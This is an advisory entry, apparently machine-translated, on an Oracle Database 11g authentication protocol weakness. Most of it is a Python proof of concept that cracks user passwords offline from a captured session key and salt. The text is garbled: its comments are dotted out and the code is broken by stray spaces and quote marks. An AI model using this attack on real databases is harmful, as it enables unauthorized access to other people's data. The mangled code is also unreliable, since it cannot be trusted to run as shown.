The latest Oracle Database authentication Protocol security bypass vulnerability-vulnerability warning-the black bar safety net

2012-10-29T00:00:00
ID MYHACK58:62201235351
Type myhack58
Reporter 佚名
Modified 2012-10-29T00:00:00

Description

The Oracle Database was found likely to cause a remote security bypass vulnerability, and impact to its own authentication Protocol. An attacker can exploit this vulnerability to bypass the database authentication to access the database from unauthorized access.

Affected versions: Oracle Database 11g Release 1 and 11g Release 2

Open with code as follows:

> > #--coding:utf8 -- > > import hashlib > from Crypto. Cipher import AES > > def decrypt(session,salt,password): > pass_hash = hashlib. sha1(password+salt) > > #......... ..... ..... .......... .. 2 4 .... > key = pass_hash. digest() + '\x00\x00\x00\x00' > decryptor = AES. new(key,AES. MODE_CBC) > plain = decryptor. the decrypt(session) > return plain > > #............. ........... ...... 4 8 .... > session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767' > > #.... 1 0 .... > salt_hex = 'A7193E546377EC56639E' > > passwords = ['test','password','oracle','demo'] > > for password in passwords: > session_id = decrypt(session_hex. decode('hex'),salt_hex. decode('hex'),password) > print 'Decrypted session_id for password "%s" is %s' % (password,session_id. encode('hex')) > if session_id[4 0:] == '\x08\x08\x08\x08\x08\x08\x08\x08': > print 'PASSWORD IS "%s"' % password > break